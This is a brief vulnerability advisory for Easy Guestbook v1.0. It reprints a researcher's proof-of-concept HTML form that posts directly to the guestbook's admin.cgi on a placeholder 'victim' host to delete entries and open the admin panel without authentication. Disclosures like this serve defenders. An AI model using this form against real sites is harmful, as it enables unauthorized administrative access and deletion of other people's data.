|
Ben Chivers Easy Guestbook Administrative Access Vulnerability
The following proof of concept was provided by Arek Suroboyo <ar3su@yahoo.com>: <html> <body> <h1>Easy Guestbook v1.0 Vulnerabilities</h1> <form method="POST" action="http://victim/guestbook/admin.cgi"> Delete No. of Entries in Guestbook: <input type="text" value="" name="function" size="5"> <input type="submit" value="Delete Message" name="delete_message" style="font-size: 10pt; font-family: verdana; font-weight: bold"><br><hr> Open Administration Guestbook: <input type="submit" value="Back to Admin" name="back_to_admin" style="color: #800080; fo nt-weight: bold"> </form> </body> </html> |
|
 Privacy Statement |
